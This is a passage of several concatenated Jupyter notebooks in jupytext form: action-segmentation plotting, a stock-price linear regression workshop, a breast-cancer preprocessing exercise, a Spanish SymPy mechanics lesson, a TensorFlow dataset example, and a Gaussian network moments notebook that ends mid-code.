features = np.load(features_path + vid.split('.')[0] + '.npy')
features = features[:, ::sample_rate]
input_x = torch.tensor(features, dtype=torch.float)
input_x.unsqueeze_(0)
input_x = input_x.to(device)
split_idx = 0
for i in range(len(split_dict.keys())):
if vid.split('.')[0] in split_dict[i+1]:
split_idx = i+1
break
curr_backbone = backbones[split_idx]
curr_backbone.eval()
if main_backbone_name != 'asrf':
if main_backbone_name == 'mstcn':
mask = torch.ones(input_x.size(), device=device)
action_pred = curr_backbone(input_x, mask)[-1]
elif main_backbone_name == 'mgru':
action_pred = curr_backbone(input_x)
elif main_backbone_name == 'sstda':
mask = torch.ones(input_x.size(), device=device)
action_pred, _, _, _, _, _, _, _, _, _, _, _, _, _ = curr_backbone(input_x,
input_x,
mask,
mask,
[0, 0],
reverse=False)
action_pred = action_pred[:, -1, :, :]
action_idx = torch.argmax(action_pred, dim=1).squeeze().detach()
else:
out_cls, out_bound = curr_backbone(input_x)
postprocessor = PostProcessor("refinement_with_boundary", asrf_cfg.boundary_th)
refined_output_cls = postprocessor(out_cls.cpu().data.numpy(), boundaries=out_bound.cpu().data.numpy(),
masks=torch.ones(1, 1, input_x.shape[-1]).bool().data.numpy())
action_idx = torch.Tensor(refined_output_cls).squeeze().detach()
_, predictions, _ = model(action_idx.to(device), input_x)
_, predicted = torch.max(predictions.data, 1)
predicted = predicted.squeeze()
backbone_time, backbone_ind = get_segment_idx(action_idx)
backbone_ind = [int(x.item()) for x in backbone_ind]
refine_time, refine_ind = get_segment_idx(predicted)
refine_ind = [x.item() for x in refine_ind]
gt_time, gt_ind = get_segment_idx(gt_segment)
plt.figure(figsize=(15, 5))
plt.axis('off')
thres = 1000000
for i, t in enumerate(gt_time[:-1]):
if t < thres*sample_rate:
plt.plot([t/sample_rate, gt_time[i+1]/sample_rate], [4, 4], linewidth=30, color=RGB_tuples[gt_ind[i]])
for i, t in enumerate(backbone_time[:-1]):
if t < thres:
plt.plot([t, backbone_time[i+1]], [2, 2], linewidth=30, color=RGB_tuples[backbone_ind[i]])
for i, t in enumerate(refine_time[:-1]):
if t < thres:
plt.plot([t, refine_time[i+1]], [0, 0], linewidth=30, color=RGB_tuples[refine_ind[i]])
plt.pause(0.1)
gt_name = get_name(gt_ind, actions_dict)
bb_name = get_name(backbone_ind, actions_dict)
refine_name = get_name(refine_ind, actions_dict)
print(gt_name)
print(bb_name)
print(refine_name)
print('='*80)
plot_prediction(model, curr_backbone, main_backbones,
split_dict, model_dir, result_dir, gt_path, features_path,
vid_list_file_tst, actions_dict, device, sample_rate)
# ####
|
show_qualitative_results.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# # Machine Learning Basics
# ###### <NAME>
# ### 0. Introduction
# #### Machine Learning with scikit-learn
# 
# Scikit-learn (formerly scikits.learn) is a free software machine learning library for the Python programming language. It features various classification, regression and clustering algorithms including support vector machines, random forests, gradient boosting, k-means and DBSCAN, and is designed to interoperate with the Python numerical and scientific libraries NumPy and SciPy.
# ##### A world of possibilities...
# 
# ##### Main objectives of this workshop
# * Provide you with the basic skills to machine learning tasks such as:
# - Supervised Algotithms
# - Linear Regression Model
# - Data Preparation
# ### 1. Remote Data Access
# #### Pandas DataReader
# Functions from pandas.io.data and pandas.io.ga extract data from various Internet sources into a DataFrame. In pandas 0.17.0, the sub-package pandas.io.data will be removed in favor of a separately installable pandas-datareader package. This will allow the data modules to be independently updated to your pandas installation.
# See the pandas-datareader documentation for more details: http://pandas-datareader.readthedocs.org/
# +
# Data Analysis
import numpy as np
import pandas as pd
# Remote Data Access
from pandas_datareader import data, wb
# +
stocks = ['AAPL', 'GOOG', 'YHOO', 'GBP=X', 'SPY', 'JPY=X', 'EUR=X']
wp = data.YahooDailyReader(stocks, '2016-01-01', '2016-08-31').read()
wp
# -
# #### Panel Data
# 
# The term panel data is derived from econometrics and is partially responsible for the name pandas: pan(el)-da(ta)-s. The names for the 3 axes are intended to give some semantic meaning to describing operations involving panel data and, in particular, econometric analysis of panel data. However, for the strict purposes of slicing and dicing a collection of DataFrame objects, you may find the axis names slightly arbitrary:
#
# - items: axis 0, each item corresponds to a DataFrame contained inside
# - major_axis: axis 1, it is the index (rows) of each of the DataFrames
# - minor_axis: axis 2, it is the columns of each of the DataFrames
wp.to_frame().head(10)
wp.Close.head()
dataset = wp.Close.ffill().dropna()
dataset.head()
# ### 2. Data Visualization
# Plot
# %matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.ticker as mtick
def plot_model(dataset, title='Plot', xlabel='Date', ylabel='Price'):
# Plot outputs
params = {
'font.family' : 'arial',
'font.style' : 'normal',
'legend.fontsize': 'large',
'figure.figsize': (15, 8),
'axes.labelsize': 'x-large',
'axes.titlesize':'x-large',
'xtick.labelsize':'small',
'ytick.labelsize':'small',
}
plt.rcParams.update(params)
dataset.plot()
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
plt.xticks(rotation=45)
plot_model(dataset, 'Stocks: Close')
norm_data = dataset / dataset.iloc[0]
plot_model(norm_data, 'Stocks: normalized Close', ylabel='Normalized Close')
# ### 3. Machine Learning
# Machine learning is a subfield of computer science that evolved from the study of pattern recognition and computational learning theory in artificial intelligence. In 1959, <NAME> defined machine learning as a "Field of study that gives computers the ability to learn without being explicitly programmed". Machine learning explores the study and construction of algorithms that can learn from and make predictions on data.
# Machine Learning is divided between 3 mayor categories:
# - Supervised: All data is labeled and the algorithms learn to predict the output from the input data.
# - Unsupervised: All data is unlabeled and the algorithms learn to inherent structure from the input data.
# - Semi-supervised: Some data is labeled but most of it is unlabeled and a mixture of supervised and unsupervised techniques can be used.
# #### Supervised Algorithm
# Supervised learning problems can be further grouped into regression and classification problems.
# - Classification: A classification problem is when the output variable is a category, such as “BUY” or “SELL”.
# - Regression: A regression problem is when the output variable is a real value, such as the “Close Price”.
# ##### Linear Regression Model
# Linear Regression is the oldest and most widely used predictive model in the field of machine learning. The goal is to minimize the sum of the squared errros to fit a straight line to a set of data points.
#
#
# The linear regression model fits a linear function to a set of data points. The form of the function is:
#
# Y = β0 + β1*X1 + β2*X2 + … + βn*Xn
#
#
# Where Y is the target variable, and X1, X2, ... Xn are the predictor variables and β1, β2, … βn are the coefficients that multiply the predictor variables. β0 is constant.
from sklearn import linear_model
# +
# define the target
target = 'GOOG'
# prepare the target dataset
dataset_target = dataset.copy()
dataset_target[target] = dataset_target[target].shift(-1)
dataset_target = dataset_target.dropna()
# define the percentage of training dataset ex. 60%
train_ix = len(dataset_target)*60//100
## Split the data into training set
dataset_X_train = dataset_target[:train_ix].drop(target, axis=1)
dataset_y_train = dataset_target[:train_ix][target].to_frame()
# +
## Create linear regression object
regr = linear_model.LinearRegression()
## Train the model using the training sets
regr.fit(dataset_X_train, dataset_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(dataset_X_train) - dataset_y_train) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_train, dataset_y_train))
# +
## Split the targets into test set
dataset_X_test = dataset_target[train_ix:].drop(target, axis=1)
dataset_y_test = dataset_target[train_ix:][target].to_frame()
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(dataset_X_test) - dataset_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_test, dataset_y_test))
# +
results = dataset_y_test
results['predicted'] = regr.predict(dataset_X_test)
# Plot outputs
plot_model(results[[target, 'predicted']], 'Linear Regression Model')
# -
# Scatter Plot
fit = np.polyfit(results[target], results['predicted'], deg=1)
results.plot(kind='scatter', x=target, y='predicted')
plt.plot(results[target], fit[0] * results[target] + fit[1], color='red')
plt.show()
# +
# LONG & SHORT simulation based on the prediction
results['long'] = results['predicted'].gt(results['predicted'].shift(1))
results['equity'] = results[target].pct_change()
results.loc[results['long'] != True, 'equity'] = results['equity'] * -1
results['strategy'] = results['equity'].cumsum()
results['stock'] = results[target].pct_change().cumsum()
# Profit Loss Plot
ax = results[['strategy', 'stock']].plot(title='Profit Loss')
fmt = '{x:.2%}' # https://pyformat.info/
yticks = mtick.StrMethodFormatter(fmt) # Use the new-style format string
ax.yaxis.set_major_formatter(yticks)
plt.show()
# +
# define the target
target = 'GOOG'
# returns dataset
returns = dataset.loc[:, dataset.columns != target].pct_change().fillna(0)
returns = returns.join(dataset[[target]])
# prepare the target dataset
returns[target] = returns[target].shift(-1)
returns = returns.dropna()
# -
dataset.head()
returns.head()
# +
# define the percentage of training dataset ex. 60%
train_ix = len(returns)*60//100
## Split the data into training set
dataset_X_train = returns[:train_ix].drop(target, axis=1)
dataset_y_train = returns[:train_ix][target].to_frame()
## Create linear regression object
regr = linear_model.LinearRegression()
## Train the model using the training sets
regr.fit(dataset_X_train, dataset_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(dataset_X_train) - dataset_y_train) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_train, dataset_y_train))
## Split the targets into test set
dataset_X_test = returns[train_ix:].drop(target, axis=1)
dataset_y_test = returns[train_ix:][target].to_frame()
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((regr.predict(dataset_X_test) - dataset_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_test, dataset_y_test))
results = dataset_y_test
results['predicted'] = regr.predict(dataset_X_test)
# Plot outputs
plot_model(results[[target, 'predicted']], 'Linear Regression Model')
# Scatter Plot
fit = np.polyfit(results[target], results['predicted'], deg=1)
results.plot(kind='scatter', x=target, y='predicted')
plt.plot(results[target], fit[0] * results[target] + fit[1], color='red')
plt.show()
# LONG & SHORT simulation based on the prediction
results['long'] = results['predicted'].gt(results['predicted'].shift(1))
results['equity'] = results[target].pct_change()
results.loc[results['long'] != True, 'equity'] = results['equity'] * -1
results['strategy'] = results['equity'].cumsum()
results['stock'] = results[target].pct_change().cumsum()
# Profit Loss Plot
ax = results[['strategy', 'stock']].plot(title='Profit Loss')
fmt = '{x:.2%}' # https://pyformat.info/
yticks = mtick.StrMethodFormatter(fmt) # Use the new-style format string
ax.yaxis.set_major_formatter(yticks)
plt.show()
# -
# TODO List:
# * Compare the 2 strategies: Price & Returns
# * Make a Function to automatise the ML
# # Thanks for your attention!
# ## Any Questions?
# Notebook style
from IPython.core.display import HTML
css_file = './static/style.css'
HTML(open(css_file, "r").read())
|
01 - Machine Learning Basics.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (myenv)
# language: python
# name: myenv
# ---
# # Course Name: Visualisation for Data Analytics
# # Objective: Data Pre-Processing
# ### Dataset credit: https://archive.ics.uci.edu/ml/datasets/Breast+Cancer
# #### NOTE: I have modified some parts of the dataset and added missing values in it
# Import Libraries
import pandas as pd
# + [markdown] pycharm={"name": "#%% md\n"}
# # Read Data given to in csv file with the lab
# + pycharm={"name": "#%%\n"}
data = pd.read_csv("breast-cancer.csv")
# + [markdown] pycharm={"name": "#%% md\n"}
# ### Q1. find null values for the column 'deg'
# + pycharm={"name": "#%%\n"}
missing_deg = data["deg"].isnull().sum()
missing_deg
# -
# ### Q2 Find null values for the column 'node-cap'
# + pycharm={"name": "#%%\n"}
missing_nodecap = data[data["node-caps"].isnull()]
missing_nodecap
# -
# ### Q3. Count the percentage of missing values in a column 'deg'. Drop these columns if the percentage of missing values is greater than equal to 75%.
# + pycharm={"name": "#%%\n"}
rows = data["deg"].count()
percent = missing_deg / rows * 100
print(f"Percentage Missing = {percent}")
# -
# ### Q4. Replace the 'null' values by average for the 'deg' column?
# +
data["deg"].fillna(data["deg"].mean(), inplace=True)
data
# -
# ### Q5. Drop rows consisting of null or missing values
# + pycharm={"name": "#%%\n"}
data.dropna(inplace=True)
data
# -
# ### Q6. Find and drop rows consisting of duplicate data?
data.drop_duplicates(inplace=True)
data
# ### Q7 Encode columns consisting of categorical data using 'OrdinalEncoder'
# +
from sklearn import preprocessing
# -
enc=preprocessing.OrdinalEncoder()
enc.fit(data)
print(enc.fit(data))
# + pycharm={"name": "#%%\n"}
enc.fit_transform(data)
# + pycharm={"name": "#%%\n"}
|
06-data-pre-processing-questions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img src="../images/aeropython_logo.png" alt="AeroPython" style="width: 300px;"/>
# # Mecánica con SymPy
# _Si SymPy te ha parecido hasta ahora un CAS decente e incluso interesante (nada como tener los resultados en $\LaTeX$ incrustados en el notebook y la sintaxis de Python para hacer cálculo simbólico) entonces espera a ver el paquete `mechanics`. Con él, podremos manipular velocidades y aceleraciones de sólidos expresadas en distintos sistemas de referencia con una facilidad impresionante._
#
# _Tienes disponible la documentación de `mechanics` en http://docs.sympy.org/0.7.5/modules/physics/mechanics/index.html._
# ## Sistemas de referencia
# El objeto primordial que vamos a manejar van a ser los sistemas de referencia. Podremos definir relaciones geométricas entre ellos y de esta forma las transformaciones de vectores entre un sistema y otro serán triviales.
# La manera usual de empezar a trabajar con SymPy es importar la función `init_session`:
# ```
# from sympy import init_session
# init_session(use_latex=True)```
#
# Esta función ya se encarga de importar todas las funciones básicas y preparar las salidas gráficas. Sin embargo, en este momento, esta función se encuentra en mantenimiento para su uso dentro de los notebooks por lo que activaremos la salida gráfica e importaremos las funciones de la manera usual. Puedes consultar el estado de la corrección en: https://github.com/sympy/sympy/pull/13300 y https://github.com/sympy/sympy/issues/13319 .
# Todo lo que necesitamos está en `sympy.physics.mechanics`, incluyendo la clase `ReferenceFrame`. Nada más crear un sistema de referencia podemos acceder a sus versores unitarios: `x`, `y` y `z`.
#
# http://docs.sympy.org/0.7.5/modules/physics/vector/vectors.html
# Y para definir vectores solo tenemos que **multiplicar cada componente por su versor**:
# De ahora en adelante, para trabajar como si nos enfrentáramos a un problema de la escuela, vamos a hacer dos cosas:
#
# * Definir un sistema inercial $1$ del que partir, para así poder referir todos los demás sistemas a él.
# * Que los versores de ese sistema sean $i, j, k$.
# Y para no tener que hacerlo siempre, un pequeño truco de magia:
# Definimos nuestra propia clase para que los versores sean IJK
# aeropython: preserve
class IJKReferenceFrame(ReferenceFrame):
def __init__(self, name):
super().__init__(name, latexs=['\mathbf{%s}_{%s}' % (idx, name) for idx in ("i", "j", "k")])
self.i = self.x
self.j = self.y
self.k = self.z
# ### Álgebra vectorial
# Nuestros vectores funcionan también con símbolos, y podemos realizar las operaciones de producto escalar y producto vectorial con ellos.
# Podemos hallar también la norma de los vectores con su método `magnitude` e incluso normalizarlos con `normalize`:
# ##### Ejercicio
#
# Usando directamente la fórmula para la derivada en ejes móviles:
#
# $$\left(\frac{\operatorname{d}\!\mathbf{a}}{\operatorname{d}\!t}\right)_1 = \left(\frac{\operatorname{d}\!\mathbf{a}}{\operatorname{d}\!t}\right)_0 + \mathbf{\omega}_{01}\! \times \mathbf{a}$$
#
# Calcula la derivada del vector de posición $R \mathbf{i}_0$, siendo $A_0$ un sistema de referencia que gira respecto al inercial con velocidad angular $\mathbf{\omega}_{01}=\Omega \mathbf{k}_0$. **¿Cuál es el módulo de la derivada?**
# <div class="alert alert-warning">Si no especificaste `positive=True` vas a ver algo como $\sqrt{\Omega^2 R^2}$. Debería haber una forma de simplificar esta expresión _a posteriori_, pero de momento no funciona del todo bien. Preparando este notebook nos hemos dado cuenta y ya les hemos avisado :) https://github.com/sympy/sympy/issues/8326
# </div>
# ### Movimiento relativo
# ¿A quién no le gusta multiplicar matrices de rotación? Para esa minoría que lo detesta, existe SymPy. Para ello debemos especificar la orientación de nuestros sistemas de referencia usando el método `orient`, y recuperaremos la matriz de cosenos directores usando el método `dcm`.
# Usando el argumento `Axis` hemos especificado que rotamos el sistema un ángulo especificado alrededor de un eje. Otros métodos son:
#
# * `Body`: se especifican los tres ángulos de Euler.
# * `Space`: igual que `Body`, pero las rotaciones se aplican en orden inverso.
# * `Quaternion`: utilizando cuaternios, rotación alrededor de un vector unitario $\lambda$ una cantidad $\theta$.
# <div class="alert alert-success">¿Qué es lo bueno de usar uno de estos métodos? ¡Que **siempre** tenemos la transformación bien definida! Es imposible meter "a capón" una matriz de rotación que sea incorrecta o absurda.</div>
# #### Diferente sistema de referencia
#
# Para expresar un vector en otro sistema de referencia, no hay más que usar los métodos `express` o `to_matrix`:
# #### Símbolos dinámicos
#
# Si queremos especificar que un símbolo puede variar con el tiempo, hay que usar la función `dynamicsymbols`:
# Y pedir su derivada con el método `diff`:
# ##### Ejercicio
#
# 
#
# (Sacado de Cuerva et al. "Teoría de los Helicópteros")
#
# **Obtener la matriz de rotación de la pala $B$ respecto a los ejes $A1$.**
# #### Velocidad angular
#
# También podemos hallar la velocidad angular de un sistema respecto a otro usando el método `ang_vel_in`:
# En ocasiones, la representación gráfica puede fallar, pero se puede volver a desactivar y activar llamando a la función`init_printing(pretty_print=True)` con diferentes valores (True/False) para `pretty_print`
# ### Derivada en ejes móviles
#
# Hacer una derivada con la fórmula lo hace cualquiera, pero SymPy puede encargarse automáticamente.
# +
#v1.diff(dynamicsymbols._t, A2)
# -
# ### Puntos, velocidades y la rueda que no desliza
# El último paso que nos queda para completar la cinemática es la posibilidad de definir puntos en sólidos y aplicar su campo de velocidades. SymPy también permite esto, y para ello no tenemos más que importar la clase `Point`.
# Para trabajar como lo haríamos en la escuela, vamos a especificar que $O$ es el origen de $A$, y para eso vamos a imponer que su velocidad es cero con el método `set_vel`:
# Para definir nuevos puntos, podemos utilizar el método `locate_new`:
# Y para obtener vectores de un punto a otro, el método `pos_from`:
# <div class="alert alert-info">La notación de este paquete está influenciada por el libro Kane, <NAME>. & <NAME>. "Dynamics, Theory and Applications". Es ligeramente distinto a como estudiamos nosotros en la escuela, pero ¡están abiertos a que les hagamos cualquier tipo de sugerencia! https://github.com/sympy/sympy/issues/2584#issuecomment-31552654</div>
# Por último, el **campo de velocidades de un sólido rígido** se formula usando el método `v2pt_theory`.
#
# $$v^P_A = v^O_A + \omega_{A_1 A} \times \mathbf{OP}$$
#
# Este método pertenece *al punto del cual queremos conocer la velocidad* y recibe tres parámetros:
#
# * `O`, punto de velocidad conocida respecto a A
# * `A`, sistema de referencia donde queremos calcular la velocidad
# * `A1`, sistema de referencia donde están fijos ambos puntos (_sistema de arrastre_)
#
# Por tanto, para hallar la velocidad del punto que acabamos de crear:
# ##### Ejercicio
#
# 
#
# (Apuntes de <NAME>)
#
# **¡Halla la velocidad y la aceleración de $P$!**
# +
# Creamos nuestros sistemas de referencia
# +
# Creamos los símbolos dinámicos necesarios
# +
# Orientamos los sistemas de referencia
# -
# +
# Creamos el punto C, centro del disco, y especificamos su velocidad
# respecto a A1
# +
# Localizamos el punto P, punto fijo del disco, respecto a C, en
# el sistema A2 (que gira solidariamente con el disco)
# +
# Hallamos la velocidad de P en A1, expresada en A0
# ¡Con esta llamada ya estamos diciendo que C y P son fijos en A2!
# -
# **Misión cumplida :)**
# ---
# _Hemos hecho un repaso bastante profundo de las posibilidades del paquete `mechanics` de SymPy. Nos hemos dejado algunas cosas en el tintero pero no demasiadas: esta funcionalidad aún se está expandiendo y necesita pulir algunos detalles._
#
# **Referencias**
#
# * Capítulo de **aeromecánica** del libro de Cuerva y otros http://nbviewer.ipython.org/gist/Juanlu001/7711865
# * Estabilidad longitudinal de un Boeing 747 http://nbviewer.ipython.org/github/AlexS12/Mecanica_Vuelo/blob/master/MVII_MatrizSistema.ipynb
#
# _¿Serás tú el siguiente que publique un notebook usando SymPy? ;)_
# Si te ha gustado esta clase:
#
# <a href="https://twitter.com/share" class="twitter-share-button" data-url="https://github.com/AeroPython/Curso_AeroPython" data-text="Aprendiendo Python con" data-via="pybonacci" data-size="large" data-hashtags="AeroPython">Tweet</a>
# <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
#
# ---
# #### <h4 align="right">¡Síguenos en Twitter!
# ###### <a href="https://twitter.com/Pybonacci" class="twitter-follow-button" data-show-count="false">Follow @Pybonacci</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> <a href="https://twitter.com/Alex__S12" class="twitter-follow-button" data-show-count="false" align="right";>Follow @Alex__S12</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> <a href="https://twitter.com/newlawrence" class="twitter-follow-button" data-show-count="false" align="right";>Follow @newlawrence</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
# ##### <a rel="license" href="http://creativecommons.org/licenses/by/4.0/deed.es"><img alt="Licencia Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">Curso AeroPython</span> por <span xmlns:cc="http://creativecommons.org/ns#" property="cc:attributionName"><NAME> y <NAME></span> se distribuye bajo una <a rel="license" href="http://creativecommons.org/licenses/by/4.0/deed.es">Licencia Creative Commons Atribución 4.0 Internacional</a>.
# ##### <script src="//platform.linkedin.com/in.js" type="text/javascript"></script> <script type="IN/MemberProfile" data-id="http://es.linkedin.com/in/juanluiscanor" data-format="inline" data-related="false"></script> <script src="//platform.linkedin.com/in.js" type="text/javascript"></script> <script type="IN/MemberProfile" data-id="http://es.linkedin.com/in/alejandrosaezm" data-format="inline" data-related="false"></script>
# ---
# _Las siguientes celdas contienen configuración del Notebook_
#
# _Para visualizar y utlizar los enlaces a Twitter el notebook debe ejecutarse como [seguro](http://ipython.org/ipython-doc/dev/notebook/security.html)_
#
# File > Trusted Notebook
# Esta celda da el estilo al notebook
from IPython.core.display import HTML
css_file = '../styles/aeropython.css'
HTML(open(css_file, "r").read())
|
notebooks_vacios/041-SymPy-Mecanica.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
def train_decode_line(row):
cols = tf.io.decode_csv(row, record_defaults=[[0.], ['house'], [0.]])
myfeatures = {'sq_footage':cols[0], 'type':cols[1]}
mylabel = cols[2] #price
return myfeatures, mylabel
def predict_decode_line(row):
cols = tf.decode_csv(row, record_defaults=[[0.], ['house']])
myfeatures = {'sq_footage':cols[0], 'type':cols[1]}
return myfeatures
line_dataset = tf.data.TextLineDataset('./curated_data/train.csv')
line_dataset
for line in line_dataset.take(4):
print(line)
train_dataset = line_dataset.map(train_decode_line)
for train in train_dataset.take(4):
print(train)
|
Chapter03/datasets/create_dataset_from_text.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# ## Gaussian Network Moments (GNMs)
#
# Let $\mathbf{x}\sim\mathcal{N}\left(\mathbf{\mu}, \mathbf{\Sigma}\right)$ and $q(x) = \max(x, 0)$ where $\Phi(x)$ and $\varphi(x)$ are the CDF and PDF of the normal distribution,
#
# $\mathbb{E}\left[q(\mathbf{x})\right] = \mathbf{\mu}\odot\Phi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right) + \mathbf{\sigma}\odot\varphi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right)$
# where $\mathbf{\sigma} = \sqrt{\text{diag}\left(\mathbf{\Sigma}\right)}$ with
# $\odot$ and $\oslash$ as element-wise product and division.
#
# $\mathbb{E}\left[q^2(\mathbf{x})\right] =
# \left(\mathbf{\mu}^2+\mathbf{\sigma}^2\right) \odot \Phi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right) + \mathbf{\mu} \odot \mathbf{\sigma} \odot \varphi\left(\mathbf{\mu}\oslash\mathbf{\sigma}\right)$
# where $\text{var}\left[q(\mathbf{x})\right] = \mathbb{E}\left[q^2(\mathbf{x})\right] - \mathbb{E}\left[q(\mathbf{x})\right]^2$
#
# $\left.\mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right]\right|_{\mathbf{\mu} = \mathbf{0}} = c\left(\mathbf{\Sigma}\oslash\mathbf{\sigma}\mathbf{\sigma}^\top\right) \odot \mathbf{\sigma}\mathbf{\sigma}^\top$
# where $c(x) = \frac{1}{2\pi}\left(x\cos^{-1}(-x)+\sqrt{1-x^2}\right)$
# (Note: $\left|c(x) - \Phi(x - 1)\right| < 0.0241$)
#
# $\text{cov}\left[q(\mathbf{x})\right] = \mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right] - \mathbb{E}\left[q(\mathbf{x})\right]\mathbb{E}\left[q(\mathbf{x})\right]^\top$
# where $\left.\text{cov}\left[q(\mathbf{x})\right]\right|_{\mathbf{\mu} = \mathbf{0}} = \left.\mathbb{E}\left[q(\mathbf{x})q(\mathbf{x})^\top\right]\right|_{\mathbf{\mu} = \mathbf{0}} - \frac{1}{2\pi}\mathbf{\sigma}\mathbf{\sigma}^\top$
# +
import sys
import torch
import unittest
from torch import nn
from pprint import pprint
from types import ModuleType
import network_moments.torch as nm
seed = 77 # for reproducability
def traverse(obj, exclude=[]):
data = []
if type(obj) is not ModuleType:
return data
for e in dir(obj):
if not e.startswith('_') and all(e != s for s in exclude):
sub = traverse(obj.__dict__[e], exclude)
data.append(e if len(sub) == 0 else {e:sub})
return data
print(nm.__doc__)
print('Network Moments Structure:')
pprint(traverse(nm.gaussian, exclude=['tests', 'general']))
# -
# ### Testing the tightness of the expressions on using tests
runner = unittest.TextTestRunner(sys.stdout, verbosity=2)
load = unittest.TestLoader().loadTestsFromModule
result = runner.run(unittest.TestSuite([
load(nm.gaussian.affine.tests),
load(nm.gaussian.relu.tests),
]))
# ### Testing the tightness of the expressions on affine-ReLU-affine networks
rand = nm.utils.rand
gnm = nm.gaussian.affine_relu_affine
print(gnm.special_variance.__doc__)
# +
length = 3
count = 1000000
dtype = torch.float64
device = torch.device('cpu', 0)
torch.manual_seed(seed)
# input mean and covariance
mu = torch.randn(length, dtype=dtype, device=device)
cov = rand.definite(length, dtype=dtype, device=device,
positive=True, semi=False, norm=1.0)
# variables
A = torch.randn(length, length, dtype=dtype, device=device)
c1 = -A.matmul(mu) # torch.randn(length, dtype=dtype)
B = torch.randn(length, length, dtype=dtype, device=device)
c2 = torch.randn(length, dtype=dtype, device=device)
# analytical output mean and variance
out_mu = gnm.mean(mu, cov, A, c1, B, c2)
out_var = gnm.special_variance(cov, A, B)
# Monte-Carlo estimation of the output mean and variance
normal = torch.distributions.MultivariateNormal(mu, cov)
samples = normal.sample((count,))
out_samples = samples.matmul(A.t()) + c1
out_samples = torch.max(out_samples, torch.zeros([], dtype=dtype, device=device))
out_samples = out_samples.matmul(B.t()) + c2
mc_mu = torch.mean(out_samples, dim=0)
mc_var = torch.var(out_samples, dim=0)
# printing the ratios
print('Monte-Carlo mean / Analytical mean:')
print((mc_mu / out_mu).cpu().numpy())
print('Monte-Carlo variance / Analytical variance:')
print((mc_var / out_var).cpu().numpy())
# -
# ### Linearization
# +
batch = 1
num_classes = 10
image_size = (28, 28)
dtype = torch.float64
device = torch.device('cpu', 0)
size = torch.prod(torch.tensor(image_size)).item()
x = torch.rand(batch, *image_size, dtype=dtype, device=device)
model = nn.Sequential(
nm.utils.flatten,
nn.Linear(size, num_classes),
)
model.type(dtype)
if device.type != 'cpu':
model.cuda(device.index)
jac, bias = nm.utils.linearize(model, x)
A = list(model.children())[1].weight
print('Tightness of A (best is zero): {}'.format(
torch.max(torch.abs(jac - A)).item()))
b = list(model.children())[1].bias
print('Tightness of b (best is zero): {}'.format(
torch.max(torch.abs(bias - b)).item()))
# -
# ### Two-stage linearization
# +
count = 10000
num_classes = 10
image_size = (28, 28)
dtype = torch.float64
device = torch.device('cpu', 0)
gnm = nm.gaussian.affine_relu_affine
size = torch.prod(torch.tensor(image_size)).item()
x = torch.rand(1, *image_size, dtype=dtype, device=device)
# deep model
first_part = nn.Sequential(
nm.utils.flatten,
nn.Linear(size, 500),
nn.ReLU(),
nn.Linear(500, 500),
nn.ReLU(),
nn.Linear(500, 300),
)
first_part.type(dtype)
relu = nn.Sequential(
nn.ReLU(),
)
relu.type(dtype)
second_part = nn.Sequential(
nn.Linear(300, 100),
nn.ReLU(),
nn.Linear(100, num_classes),
)
second_part.type(dtype)
if device.type != 'cpu':
